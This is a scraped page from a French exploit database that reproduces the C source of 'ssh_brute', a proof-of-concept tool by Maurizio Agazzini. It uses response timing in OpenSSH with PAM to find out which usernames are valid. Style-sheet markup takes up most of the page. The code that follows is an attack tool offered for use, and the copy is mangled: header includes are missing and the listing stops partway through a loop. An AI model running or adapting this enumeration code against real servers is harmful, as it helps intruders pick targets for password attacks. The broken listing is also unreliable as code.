K-Otik Security : OpenSSH/PAM <meta content="bugtraq,france,francais,failles,exploits,hack,sécurité,informatique,piratage" name="keywords"> <meta content="Base de données française" name="description"> <meta http-equiv="MSThemeCompatible" content="Yes"> <style type="text/css"> BODY { SCROLLBAR-ARROW-COLOR: #204558; SCROLLBAR-BASE-COLOR: #bdbcbc } SELECT { FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } TEXTAREA { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } .bginput { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } A:link { COLOR: #000020; TEXT-DECORATION: none } A:visited { COLOR: #000020; TEXT-DECORATION: none } A:active { COLOR: #000020; TEXT-DECORATION: none } A:hover { COLOR: #000020; TEXT-DECORATION: none } #cat A:link { COLOR: #204558; TEXT-DECORATION: none } #cat A:visited { COLOR: #204558; TEXT-DECORATION: none } #cat A:active { COLOR: #204558; TEXT-DECORATION: none } #cat A:hover { COLOR: #204558; TEXT-DECORATION: none } #ltlink A:link { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:visited { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:active { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:hover { COLOR: #000020; TEXT-DECORATION: none } .thtcolor { COLOR: #204558 } .bordert { BORDER-RIGHT: #a9a9ac 1px solid; BORDER-TOP: #a9a9ac 1px solid; BORDER-LEFT: #a9a9ac 1px solid; BORDER-BOTTOM: #a9a9ac 1px solid } td {font-family:arial,helvetica,sans-serif;font-size:x-small;} </style>

OpenSSH/PAM

     * Version ZIP (ssh_brute.c + openssh-3.6.1p1_brute.diff) *

/*
                              * SSH_BRUTE - OpenSSH/PAM 
                              * Proof of concept code by Maurizio Agazzini 
                              *
                              * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
                              *
                              * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
                              *
                              * $ tar xvfz openssh-3.6.1p1.tar.gz
                              * $ patch -p0 
                              #include 
                              #include 

                              /* an illegal user */
                              #define NO_USER "not_val_user"

                              /* path of the patched ssh */
                              #define PATH_SSH "./ssh"

                              /* max time range for invalid user */
                              #define TIME_RANGE 3 

                              int main(int argc, char *argv[])
                              {
                              FILE * in;
                              char buffer[2000], username[100], *host;
                              int time_non_valid = 0, time_user = 0; 
                              int version = 1, i = 0, ret;

                              fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM   \n\n", argv[0]);
                              exit(-1);
                              }

                              version = atoi(argv[1]);
                              host = argv[3];

                              if ( ( in = fopen(argv[2], "r") ) == NULL ) {
                              fprintf(stderr, "\n Can't open %s\n", argv[2]);
                              exit(-1);
                              }

                              /* test an illegal user */
                              printf("\n Testing an illegal user\t: ");
                              fflush(stdout);

                              sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

                              for (i = 0; i